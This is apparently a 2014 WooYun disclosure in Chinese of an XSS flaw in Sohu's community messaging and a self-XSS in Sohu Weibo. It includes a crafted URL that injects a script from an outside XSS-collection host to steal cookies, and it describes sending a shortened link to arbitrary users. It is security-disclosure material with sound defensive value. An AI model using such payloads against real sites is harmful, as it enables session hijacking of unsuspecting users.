当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047550

漏洞标题:搜狐社区敏感功能存在XSS漏洞(可劫持任意用户Cookie)

相关厂商:搜狐

漏洞作者: Focusstart

提交时间:2014-01-03 16:13

修复时间:2014-02-17 16:13

公开时间:2014-02-17 16:13

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-03: 细节已通知厂商并且等待厂商处理中
2014-01-03: 厂商已经确认,细节仅向厂商公开
2014-01-13: 细节向核心白帽子及相关领域专家公开
2014-01-23: 细节向普通白帽子公开
2014-02-02: 细节向实习白帽子公开
2014-02-17: 细节向公众公开

简要描述:

唉,新年了,有木有礼物...各种寂寞啊,各种X,自X审核没过,附送给你们把

详细说明:

搜狐社区发留言给...处存在XSS,见图

11.jpg


12.jpg


构造链接:http://club.sohu.com//message/send_sig_message.php?receiveCN="><script src=http://ixss.in//24yLKt?1388480103></script>&back_encode=manage_message.php%3Fstates%3D0%26offset%3D0
转化成短地址:http://cnrdn.com/yQqC
给任意用户留言,附带链接

13.jpg


14.jpg


即可获取用户cookie,此处拿自己的账号做的测试

15.jpg


未深入~~
附送自X型XSS一枚,各种自X各种弹。。。
搜狐微博设置备注处存储型XSS,看图

1.jpg

插入代码

2.jpg

然后就无限弹框了,放在用户名上即弹...

3.jpg

漏洞证明:

都在上面了~

修复方案:

过滤!新年了礼物有木有~

版权声明:转载请注明来源 Focusstart@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-01-03 16:20

厂商回复:

感谢支持,新年快乐。^_^。

最新状态:

暂无